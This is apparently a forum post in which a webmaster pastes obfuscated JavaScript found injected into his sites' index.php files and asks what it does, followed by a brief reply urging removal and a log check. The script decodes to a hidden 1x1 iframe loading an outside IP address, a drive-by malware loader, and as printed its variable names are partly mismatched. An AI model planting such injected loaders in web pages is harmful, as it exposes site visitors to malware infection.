Apperently alot of the index.php files on multiple sites i host on a SUSE box hosted on oneandone dedicated server are being injected with javascript code i posted below... It opens up a frontpage office install on winxp when you go to the sites... Anyone know what the code below is doing and what the threat level is? I cleaned it up on some sites but left it on one for now as i dont know what it does Anyone know? infected site:mybalroom.com Greatly apreciate your time Pete ----code being injected <script language='javascript'>function cirpfjyua(lsolytfeqrzhg, nzndhq){var jyaghrpagphcgiuwrxh = "";for (var i = 0 ; i < lsolytfeqrzhg.length; ++i) xyloqymhhfkqdhgu += String.fromCharCode(nzncirpfjyuacirpfjyuacirpfjyuadhq ^(nzndhq ^ lsolytfeqrzhg.charCodeAt(i)));return xyloqymhhfkqdhgu;}var lsolytfeqrzhg = "\x20\x0d\x0a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x77\x72\x69\x74\x65\x28\x27\x3c\x64\x69\x76\x20\x73\x74\x79\x6c\x65\x3d\x22\x76\x69\x73\x69\x62\x69\x6c\x69\x74\x79\x3a\x68\x69\x64\x64\x65\x6e\x22\x3e\x3c\x69\x66\x72\x61\x6d\x65\x20\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x38\x35\x2e\x31\x37\x2e\x31\x34\x33\x2e\x31\x35\x32\x2f\x22\x20\x77\x69\x64\x74\x68\x3d\x31\x20\x68\x65\x69\x67\x68\x74\x3d\x31\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e\x3c\x2f\x64\x69\x76\x3e\x27\x29\x3b\x0d\x0a\x0d\x0a"; var xyloqymhhfkqdhgu = cirpfjyua(lsolytfeqrzhg, 121); eval(xyloqymhhfkqdhgu); </script> --------END---------
I don't know what the code is doing, but from what you write it sounds if the site got hacked, so I'd remove that code as fast as possible and find out (-> logs) how they managed to inject it.
